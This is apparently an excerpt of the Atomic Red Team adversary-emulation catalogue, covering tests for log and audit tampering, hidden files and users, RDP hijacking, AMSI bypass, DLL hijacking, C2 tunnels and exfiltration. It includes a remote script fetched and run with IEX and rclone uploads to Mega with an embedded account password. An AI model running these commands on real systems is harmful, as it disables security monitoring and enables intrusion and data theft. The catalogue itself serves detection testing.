if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Description: Update event selectors in AWS CloudTrail to disable the logging of certain management events to evade defense. This Atomic test leverages a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team). Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
Prereq: Stratus binary must be present at the ($T1562.008/src/stratus)
if [ -f $T1562.008/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check that ~/.aws/credentials has a default stanza configured
Description: This Atomic test uses Stratus Red Team to first set up a CloudTrail trail logging into an S3 bucket and then call the API to add a lifecycle rule to that bucket with an expiration of 1 day, which deletes all the logs after one day. Adversaries do this to evade detection. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
Prereq: Stratus binary must be present at the ($T1562.008/src/stratus)
if [ -f $T1562.008/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check that ~/.aws/credentials has a default stanza configured
Description: This Atomic will attempt to remove AWS VPC Flow Logs configuration. Stratus Red Team is a self-contained binary. You can use it to easily detonate offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
Prereq: Stratus binary must be present at the ($T1562.008/src/stratus)
if [ -f $T1562.008/src/stratus ]; then exit 0; else exit 1; fi;
Prereq: Check that ~/.aws/credentials has a default stanza configured
aws logs create-log-group --log-group-name log-test --region us-east-1 --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name log-test --region us-east-1 --output json
echo "*** Log Group Deleted ***"
Description: Creates a new CloudWatch log group in AWS and, upon successful creation, deletes it. Attackers use this technique to evade defenses by
deleting the log group; once it is deleted, the events the attacker generates are no longer logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
Prereq: Check that ~/.aws/credentials has a default stanza configured
Description: Creates a new CloudWatch log stream in AWS and, upon successful creation, deletes it. Attackers use this technique to evade defenses by
deleting the log stream; once it is deleted, the events the attacker generates are no longer logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html
Prereq: Check that ~/.aws/credentials has a default stanza configured
Description: Uses the Exchange Management Shell to set a mailbox audit bypass association, which prevents any mailbox audit logging entries from being generated for the target mailbox.
https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
Prereq: ExchangeOnlineManagement PowerShell module must be installed
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
Description: GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data Access, System Event, and Policy Denied.
An adversary may attempt to delete logs in order to hide their activity. However, Admin Activity, System Event, and Policy Denied logs cannot be deleted.
This Atomic attempts to delete the Activity log. An event is generated under the method name `google.logging.v2.LoggingServiceV2.DeleteLog` with a severity of `ERROR`.
Prereq: Requires gcloud
if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
Prereq: Check if user is logged in
gcloud config get-value account
T1562.009 - Impair Defenses: Safe Boot Mode
Safe Mode Boot
bcdedit /set safeboot network
Description: Configures the system to boot into Safe Mode with Networking on the next restart (the change takes effect only after a reboot). Adversaries abuse safe mode because endpoint defenses may not start under its limited boot.
Cleanup:
bcdedit /deletevalue {current} safeboot
T1562.010 - Impair Defenses: Downgrade Attack
ESXi - Change VIB acceptance level to CommunitySupported via PowerCLI
Description: An adversary can change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria. This can be accomplished via PowerCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
Prereq: Check if VMWARE PowerCLI PowerShell Module is installed.
Description: An adversary will change the VIB acceptance level to CommunitySupported to downgrade the acceptance criteria via ESXCLI. Afterwards an adversary may proceed to installing malicious VIBs on the host.
[Reference](https://www.mandiant.com/resources/blog/esxi-hypervisors-detection-hardening)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1562.010 - Impair Defenses: Downgrade Attack
PowerShell Version 2 Downgrade
PowerShell -version 2 -command 'Invoke-Mimikatz'
Description: Executes outdated PowerShell Version 2 which does not support security features like AMSI. By default the atomic will attempt to execute the cmdlet Invoke-Mimikatz whether it exists or not, as this cmdlet will be blocked by AMSI when active.
T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
Delete all auditd rules using auditctl
auditctl -D
Description: Using 'auditctl -D' deletes all existing audit rules, resulting in the loss of previously configured monitoring settings and the audit trail. This action reduces visibility into system activities, potentially leading to compliance concerns and hampering security monitoring efforts. Additionally, it poses a risk of covering unauthorized activities by erasing evidence from audit logs.
Prereq: Check if auditd is installed.
if [ $(command -v auditctl) ]; then exit 0; else exit 1; fi
Cleanup:
service auditd restart
T1562.012 - Impair Defenses: Disable or Modify Linux Audit System
Disable auditd using auditctl
auditctl -e 0
Description: The command `auditctl -e 0` disables the audit system. By setting the parameter to `0`, auditing is deactivated, halting the monitoring and recording of security-related events. This action stops the generation of audit logs, ceasing the collection of data regarding system activities. Disabling auditing may be done for various reasons, such as troubleshooting, performance optimization, or temporarily suspending auditing requirements, but it reduces visibility into system events and can impact security monitoring and compliance efforts.
Prereq: Check if auditd is installed.
if [ $(command -v auditctl) ]; then exit 0; else exit 1; fi
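A check that reads the state the two auditctl tests above change, as an added example rather than Atomic Red Team code: it classifies the audit subsystem from the text of auditctl -s and auditctl -l. The sample outputs are constructed to match the format those commands print; the function name and verdict strings are this example's own.

```bash
#!/usr/bin/env bash
# Added example, not part of Atomic Red Team: classify the state of the audit
# subsystem from the output of `auditctl -s` and `auditctl -l`, the two things
# the tests above change. The samples below are constructed; on a live host
# call:  audit_state "$(auditctl -s)" "$(auditctl -l)"

# audit_state STATUS_TEXT RULES_TEXT : one-line verdict, non-zero when impaired
audit_state() {
    local enabled rules
    enabled=$(printf '%s\n' "$1" | awk '$1 == "enabled" { print $2 }')
    rules=$(printf '%s\n' "$2" | grep -c '^-' || true)   # "No rules" has no -w/-a lines
    case "$enabled" in
        0) echo "DISABLED: auditing is off (auditctl -e 0 or equivalent)"; return 1 ;;
        1|2)
            if [ "$rules" -eq 0 ]; then
                echo "NO RULES: auditing is on but the rule set is empty (auditctl -D or equivalent)"
                return 1
            fi
            if [ "$enabled" = "2" ]; then
                echo "OK: enabled and locked (-e 2), $rules rule(s) loaded"
            else
                echo "WARN: enabled but not locked, $rules rule(s) loaded; auditctl -D / -e 0 still possible"
            fi
            return 0 ;;
        *) echo "UNKNOWN: no 'enabled' line in auditctl -s output"; return 1 ;;
    esac
}

# Constructed sample outputs (format as printed by auditctl -s / auditctl -l)
STATUS_ON='enabled 1
failure 1
pid 812
rate_limit 0
backlog_limit 8192
lost 0
backlog 0'
STATUS_OFF=$(printf '%s\n' "$STATUS_ON" | sed 's/^enabled 1$/enabled 0/')
STATUS_LOCKED=$(printf '%s\n' "$STATUS_ON" | sed 's/^enabled 1$/enabled 2/')
RULES_LOADED='-w /etc/audit/ -p wa -k auditconfig
-w /etc/sudoers -p wa -k scope
-a always,exit -F arch=b64 -S execve -k exec'
RULES_EMPTY='No rules'

audit_state "$STATUS_ON" "$RULES_LOADED"
audit_state "$STATUS_OFF" "$RULES_LOADED"
audit_state "$STATUS_ON" "$RULES_EMPTY"
audit_state "$STATUS_LOCKED" "$RULES_LOADED"
```

The third state, enabled 2, is the hardening that defeats both tests: with -e 2 as the last line of the rule file the configuration is immutable until reboot, and auditctl -D or auditctl -e 0 are refused. auditctl -s reports the kernel's state, not the daemon's, so pair this with a check that auditd itself is running.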
Description: The following Atomic adds a registry entry to disable LSA Protection.
The LSA controls and manages user rights information, password hashes and other important bits of information in memory. Attacker tools, such as mimikatz, rely on accessing this content to scrape password hashes or clear-text passwords. Enabling LSA Protection configures Windows to control the information stored in memory in a more secure fashion - specifically, to prevent non-protected processes from accessing that data.
Upon successful execution, the registry will be modified and RunAsPPL will be set to 0, disabling Lsass protection.
https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection#how-to-disable-lsa-protection
https://blog.netwrix.com/2022/01/11/understanding-lsa-protection/
https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/
Description: The atomic test disables journal logging using the built-in systemctl utility.
Cleanup:
sudo systemctl start systemd-journald   # starts the journal service
sudo systemctl enable systemd-journald  # starts the journal service automatically at boot
T1562 - Impair Defenses
Disable journal logging via sed utility
sudo sed -i 's/Storage=auto/Storage=none/' /etc/systemd/journald.conf
Description: The atomic test disables journal logging by replacing the "Storage" parameter with "none" in journald.conf. Once journald re-reads the file (the executor does not restart it, so the change takes effect only after systemctl restart systemd-journald or a reboot), new journal entries are dropped entirely; they are neither written to disk nor kept in memory, although forwarding to syslog, kmsg or the console continues if configured.
Cleanup:
sudo sed -i 's/Storage=none/Storage=auto/' /etc/systemd/journald.conf  # re-enables storage of journal data
sudo systemctl restart systemd-journald  # restart the journal service so the setting takes effect
T1563.002 - Remote Service Session Hijacking: RDP Hijacking
RDP hijacking
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
Description: [RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
Cleanup:
sc.exe delete sesshijack >nul 2>&1
T1564.001 - Hide Artifacts: Hidden Files and Directories
Create Windows System File with Attrib
attrib.exe +s %temp%\T1564.001.txt
Description: Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details
and observe that the Attributes are "SA" for System and Archive.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001.txt)
T1564.001 - Hide Artifacts: Hidden Files and Directories
Create Windows Hidden File with Attrib
attrib.exe +h %temp%\T1564.001.txt
Description: Creates a file and marks it as hidden using the attrib.exe utility. Upon execution, open File Explorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes include "H" for Hidden ("SH" if the previous test already marked the same file as a system file).
Prereq: The file must exist on disk at specified location (%temp%\T1564.001.txt)
Description: Disables the "Show hidden files" switch in the registry. Several malware families abuse this technique to hide their files from ordinary users.
See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
Description: Creates a file and marks it as hidden through PowerShell. Upon execution, open File Explorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes is "H" Hidden.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001-9.txt)
Description: Creates a file and marks it as System through PowerShell. Upon execution, open File Explorer and enable View > Hidden Items. Then, open Properties > Details on the file
and observe that the Attributes is "S" System.
Prereq: The file must exist on disk at specified location (%temp%\T1564.001-10.txt)
Description: Add a hidden user on macOS using a UniqueID below 500 (accounts with such IDs are hidden from the login window by default).
Cleanup:
sudo dscl . -delete /Users/APT
T1564.002 - Hide Artifacts: Hidden Users
Create Hidden User using IsHidden option
sudo dscl . -create /Users/APT IsHidden 1
Description: Add a hidden user on macOS using the IsHidden option.
Cleanup:
sudo dscl . -delete /Users/APT
T1564.002 - Hide Artifacts: Hidden Users
Create Hidden User in Registry
NET USER AtomicOperator$ At0micRedTeam! /ADD /expires:never
REG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /t REG_DWORD /d 0
Description: Adversaries may similarly hide user accounts in Windows. Adversaries can set the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList Registry key value to 0 for a specific user to prevent that user from being listed on the logon screen.
Reference https://attack.mitre.org/techniques/T1564/002/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Cleanup:
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v AtomicOperator$ /f >nul 2>&1
net user AtomicOperator$ /delete >nul 2>&1
Description: Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
Upon execution a hidden PowerShell window will launch calc.exe
Description: The following Atomic Red Team test leverages the Chrome headless browser to access a mockbin site. Create your own Mockbin.org site and replace the BIN in the inputs.
The default Mockbin ID forwards to google.com and you may view the details here https://mockbin.org/bin/f6b9a876-a826-4ac0-83b8-639d6ad516ec/view.
Reference: https://cert.gov.ua/article/5702579
Cleanup:
taskkill /im chrome /f
T1564.003 - Hide Artifacts: Hidden Window
Hidden Window-Conhost Execution
conhost.exe --headless calc.exe
Description: Launch conhost.exe in "headless" mode, meaning that no visible window will pop up on the victim's machine.
This could be a sign of conhost being used as a LOLBIN or of potential process injection activity.
conhost.exe can be used to proxy the execution of arbitrary commands.
Description: Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.
Upon execution, cmd will run and attempt to launch desktop.ini. No windows remain open after the test
echo cmd /c echo "Shell code execution."> %temp%\T1564.004_has_ads_cmd.txt:adstest.txt
for /f "usebackq delims=?" %i in (%temp%\T1564.004_has_ads_cmd.txt:adstest.txt) do %i
Description: Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp%
folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt"
Description: Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, run the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname"
in the %temp% directory to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder.
Prereq: The file must exist on disk at specified location ($env:TEMP\T1564.004_has_ads_powershell.txt)
md %temp%\...$.......::$index_allocation
echo too many secrets > %temp%\...$.......::$index_allocation\secrets.txt
Description: Create an Alternate Data Stream Directory and File with the command prompt. Write access is required. Upon execution,
run "dir /A /Q /R" in the %temp% folder to view that the alternate data stream folder exists. To view the data in the
alternate data stream, run "type %temp%\...$.......::$index_allocation\secrets.txt"
Description: Create a simple VirtualBox VM and start up the machine
Cleanup command stops and deletes the newly created VM and associated files
https://www.virtualbox.org/manual/ch08.html#vboxmanage-startvm
https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/
https://attack.mitre.org/techniques/T1564/006/
Prereq: VirtualBox must exist on disk at specified locations (C:\Program Files\Oracle\VirtualBox\VirtualBox.exe)
if (Test-Path "C:\Program Files\Oracle\VirtualBox\VirtualBox.exe") {exit 0} else {exit 1}
Prereq: VBoxManage must exist on disk at specified locations (C:\Program Files\Oracle\VirtualBox\VBoxManage.exe)
if (Test-Path "C:\Program Files\Oracle\VirtualBox\VBoxManage.exe") {exit 0} else {exit 1}
Description: Create a simple Hyper-V VM (Windows native hypervisor) and start up the machine
Cleanup command stops and deletes the newly created VM
https://docs.microsoft.com/en-us/virtualization/hyper-v-on-windows/quick-start/enable-hyper-v
https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/
https://attack.mitre.org/techniques/T1564/006/
Prereq: Hyper-V must be enabled on the system. Checks whether Hyper-V is enabled; if not, enables Hyper-V and forces a required restart.
Description: This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
Prereq: ExchangeOnlineManagement module must be installed.
Description: This module extracts a binary (calc.exe) from inside of another binary.
In the wild maldoc authors will use this technique to hide binaries inside of files stored
within the office document itself. An example of this technique can be seen in sample
f986040c7dd75b012e7dfd876acb33a158abf651033563ab068800f07f508226
This sample contains a document inside of itself. Document 1 is the actual maldoc itself, document 2
is the same document without all the malicious code. Document 1 will copy Document 2 to the file system
and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this
oleObject.bin file is a payload that is parsed out and executed on the file system.
Description: The following technique utilizes sc.exe and sdset to change the security descriptor of a service and "hide" it from Get-Service or sc query.
Upon successful execution, sc.exe creates a new service and changes its security descriptor.
https://twitter.com/Alh4zr3d/status/1580925761996828672
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-string-format
cmd /c "..\ExternalPayloads\nircmd.exe" win child class "Shell_TrayWnd" hide class "TrayClockWClass"
Description: NirCmd is used by threat actors to execute commands, which can include reconnaissance and privilege escalation by running commands as the SYSTEM account.
See https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis
Prereq: The Nircmd executable must exist at (..\ExternalPayloads\nircmd.exe)
if (Test-Path "..\ExternalPayloads\nircmd.exe") {exit 0} else {exit 1}
Cleanup:
cmd /c "..\ExternalPayloads\nircmd.exe" win child class "Shell_TrayWnd" show class "TrayClockWClass" -erroraction silentlycontinue | out-null
Description: This atomic test downloads a macro enabled document from the Atomic Red Team GitHub repository, simulating an end user clicking a phishing link to download the file.
The file "PhishingAttachment.xlsm" is downloaded to the %temp% directory.
Word spawned a command shell and used an IP address in the command line
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
$macrocode = " Open `"C:\Users\Public\art.jse`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
Invoke-MalDoc -macroCode $macrocode -officeProduct "Word"
Description: Word spawning a command prompt then running a command with an IP address in the command line is an indicator of malicious activity.
Upon execution, CMD will be launched and ping 8.8.8.8.
# Add user32.dll for keybd_event
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class K {
    [DllImport("user32.dll")]
    public static extern void keybd_event(byte bVk, byte bScan, uint dwFlags, UIntPtr dwExtraInfo);
}
"@
# Short delay for Run dialog
Start-Sleep -Milliseconds 500
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('calc.exe')) + "{ENTER}")
Description: Tests the **Paste and Run** technique, where users are tricked into running
malicious PowerShell commands by automating the Win+R command to open the
Run dialog and input `encoded PowerShell to execute calc.exe.`
- [Fake CAPTCHA Campaign](https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf)
- [From Clipboard to Compromise](https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn)
T1567.002 - Exfiltration Over Web Service: Exfiltration to Cloud Storage
Exfiltrate data with rclone to cloud Storage - Mega (Windows)
New-Item $env:appdata\rclone -ItemType directory
New-Item $env:appdata\rclone\rclone.conf
cd "..\ExternalPayloads\T1567.002\rclone-v*\"
.\rclone.exe config create T1567002 mega
set-Content $env:appdata\rclone\rclone.conf "[T1567002] `n type = mega `n user = atomictesting@outlook.com `n pass = vmcjt1A_LEMKEXXy0CKFoiFCEztpFLcZVNinHA"
.\rclone.exe copy --max-size 1700k "..\ExternalPayloads\T1567.002" T1567002:test -v
Description: This test uses rclone to exfiltrate data to a remote cloud storage instance. (Mega)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Prereq: rclone must exist at (..\ExternalPayloads\T1567.002\rclone-v*\)
if (Test-Path "..\ExternalPayloads\T1567.002\rclone-v*\") {exit 0} else {exit 1}
Description: This test uses rclone to exfiltrate data to a remote cloud storage instance. (AWS S3)
See https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/
Prereq: rclone must exist at (../ExternalPayloads/T1567.002/rclone-v*/)
if (Test-Path "../ExternalPayloads/T1567.002/rclone-v*/") {exit 0} else {exit 1}
Prereq: terraform must exist at (../ExternalPayloads/T1567.002/terraform-v*)
if (Test-Path "../ExternalPayloads/T1567.002/terraform-v*") {exit 0} else {exit 1}
Prereq: Must provide a valid directory or file path to exfiltrate to AWS S3
if (Test-Path "../ExternalPayloads/T1567.002/data/") {exit 0} else {exit 1}
Description: This test uses HTTP POST to exfiltrate data to a remote text storage site. (pastebin)
See https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it
Description: Creates a service specifying an arbitrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly.
Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file `art-marker.txt`
[BlackCat Ransomware (ALPHV)](https://www.varonis.com/blog/blackcat-ransomware)
[Cybereason vs. BlackCat Ransomware](https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware)
Description: Requires Sysinternals to be installed; the path to Sysinternals is one of the input_arguments.
Will start a process on a remote host.
Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost).
Prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory
if (Test-Path "..\ExternalPayloads\PsExec.exe") { exit 0} else { exit 1}
Description: This atomic attempts to emulate the unique behavior of BlackCat ransomware prior to encryption and during Lateral Movement attempts via PsExec on Windows. Uses bundled PsExec like BlackCat
Prereq: PsExec must exist on disk at "PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe"
if (Test-Path "..\ExternalPayloads\PsExec.exe") {exit 0} else {exit 1}
Description: Requires RemCom to be installed; the path to RemCom is one of the input_arguments.
Will start a process on a remote host.
Upon successful execution, cmd will utilize RemCom.exe to spawn calc.exe on a remote endpoint (default:localhost).
Prereq: RemCom tool must exist on disk in the ExternalPayloads folder
if (Test-Path "..\ExternalPayloads\remcom.exe") { exit 0} else { exit 1}
T1569.002 - System Services: Service Execution
Snake Malware Service Create
sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto
Description: The following Atomic Test will create a new service named WerFaultSvc with a binary path of WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe.
This was recently seen in the Snake Malware report.
Upon execution, sc.exe will create a new service named WerFaultSvc with a bin path \WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe and a display name of WerFault Service.
[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
Cleanup:
sc.exe delete "WerFaultSvc"
T1569.002 - System Services: Service Execution
Modifying ACL of Service Control Manager via SDSET
sc.exe sdset scmanager D:(A;;KA;;;WD)
Description: Modify permissions of the Service Control Manager via SDSET. This allows any administrative user to escalate privilege and create a service with SYSTEM level privileges. A restart is required.
[Blog](https://0xv1n.github.io/posts/scmanager/)
T1569.002 - System Services: Service Execution
Pipe Creation - PsExec Tool Execution From Suspicious Locations
cd C:\Users\Public\Temp\
.\PsExec.exe -i -s cmd -accepteula
Description: Requires the PsExec tool to be installed. BlackCat ransomware tried to propagate by creating a pipe using a PsExec process executing from suspicious locations (in this particular case the legitimate PsExec executable is embedded within the Windows variant and is dropped in the victim’s %TEMP% directory). Upon successful execution, PsExec will be executed from a suspicious location and create a new pipe to execute CMD.
Prereq: PsExec tool from Sysinternals must exist in the '\Users\Public\Temp\' directory
Description: Simulates an attacker exfiltrating data over SMB over QUIC using the New-SmbMapping command.
Prerequisites:
- A file server running Windows Server 2022 Datacenter: Azure Edition
- A Windows 11 computer
- Windows Admin Center
T1570 - Lateral Tool Transfer
Exfiltration Over SMB over QUIC (NET USE)
NET USE * '\\example.com\sales' /TRANSPORT:QUIC /SKIPCERTCHECK
copy 'C:\path\to\file.txt' '*:\'
Description: Simulates an attacker exfiltrating data over SMB over QUIC using the NET USE command.
Prerequisites:
- A file server running Windows Server 2022 Datacenter: Azure Edition
- A Windows 11 computer
- Windows Admin Center
T1571 - Non-Standard Port
Testing usage of uncommonly used port with PowerShell
Description: Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful
port check will be displayed.
T1571 - Non-Standard Port
Testing usage of uncommonly used port
echo quit | telnet google.com 8081
exit 0
Description: Testing uncommonly used port utilizing telnet.
Description: This test simulates an infected host sending a large volume of DoH queries to a command and control server.
The intent of this test is to trigger threshold based detection on the number of DoH queries either from a single source system or to a single target domain.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
Description: This test simulates an infected host beaconing via DoH queries to a command and control server at regular intervals over time.
This behaviour is typical of implants either in an idle state waiting for instructions or configured to use a low query volume over time to evade threshold based detection.
A custom domain and sub-domain will need to be passed as input parameters for this test to work. Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
Description: This test simulates an infected host returning data to a command and control server using long domain names.
The simulation involves sending DoH queries that gradually increase in length until reaching the maximum length. The intent is to test the effectiveness of detection of DoH queries for long domain names over a set threshold.
Upon execution, DNS information about the domain will be displayed for each callout in a JSON format.
Description: Microsoft Dev Tunnels enable insiders as well as threat actors to expose local ports over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port. It can be used to expose local services, web applications, local files, etc.
Reference:
- [Microsoft Docs](https://learn.microsoft.com/en-us/tunnels/dev-tunnels-overview)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/devtunnels/)
Prereq: Download devtunnel
test -f ../ExternalPayloads/devtunnel
Prereq: Login to Microsoft Dev tunnels
../ExternalPayloads/devtunnel user show | grep -q "Not logged in" && exit 1 || exit 0
Cleanup:
pkill -9 $(basename "../ExternalPayloads/devtunnel")
../ExternalPayloads/devtunnel user logout
rm ../ExternalPayloads/devtunnel
Description: Visual Studio Code Remote Tunnels can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Microsoft Docs](https://code.visualstudio.com/docs/remote/tunnels)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/vscode-server/)
Prereq: Install code-cli
which code
Prereq: Login to VSCode Dev tunnels
code tunnel user show | grep -q "not logged in" && exit 1 || exit 0
Cleanup:
pkill -9 tunnel
code tunnel unregister
code tunnel user logout
Description: Cloudflared can be used for exposing local development environment/services/files over the internet.
This atomic will generate a dev tunnel binding it to the local service running on the provided port.
Reference:
- [Cloudflared Docs](https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/)
- [LOT Tunnels](https://lottunnels.github.io/lottunnels/Binaries/cloudflared/)
Prereq: Download cloudflared
test -f "../ExternalPayloads/cloudflared" && exit 0 || exit 1
Description: Thanks to @OrOneEqualsOne for this quick C2 method.
This is to test to see if a C2 session can be established using an SSL socket.
More information about this technique, including how to set up the listener, can be found here:
https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926
Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443.
Description: Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Antimalware Scan Interface).
https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path.
Cleanup:
del %APPDATA%\updater.exe >nul 2>&1
del %APPDATA%\amsi.dll >nul 2>&1
Description: .NET components (a couple of DLLs loaded whenever .NET apps are executed) look for an environment variable called APPX_PROCESS when they are loaded.
Setting the environment variable and dropping the phantom WinAppXRT.dll in e.g. c:\windows\system32 (or any other location accessible via PATH) will ensure that
WinAppXRT.dll is loaded every time the user launches an application using .NET.
Upon successful execution, amsi.dll will be copied and renamed to WinAppXRT.dll and then WinAppXRT.dll will be copied to system32 folder for loading during execution of any .NET application.
Cleanup:
reg delete "HKEY_CURRENT_USER\Environment" /v APPX_PROCESS /f
del %windir%\System32\WinAppXRT.dll
del %APPDATA%\WinAppXRT.dll
Description: Restarting the Print Spooler service leads to C:\Windows\System32\ualapi.dll being loaded.
A malicious ualapi.dll placed in the System32 directory will be executed whenever the system starts.
Upon successful execution, amsi.dll will be copied and renamed to ualapi.dll and then ualapi.dll will be copied to the system32 folder for loading during system restart.
The Print Spooler service is also configured to auto start. A reboot of the system is required.
Cleanup:
del %windir%\System32\ualapi.dll
del %APPDATA%\ualapi.dll
T1574.001 - Hijack Execution Flow: DLL
DLL Side-Loading using the Notepad++ GUP.exe binary
"T1574.002\bin\GUP.exe"
Description: GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded.
Upon execution, calc.exe will be opened.
Prereq: Gup.exe binary must exist on disk at specified location (T1574.002\bin\GUP.exe)
if (Test-Path "T1574.002\bin\GUP.exe") {exit 0} else {exit 1}
Cleanup:
taskkill /F /IM calculator.exe >nul 2>&1
T1574.001 - Hijack Execution Flow: DLL
DLL Side-Loading using the dotnet startup hook environment variable
set DOTNET_STARTUP_HOOKS="T1574.002\bin\preloader.dll"
dotnet -h > nul
echo.
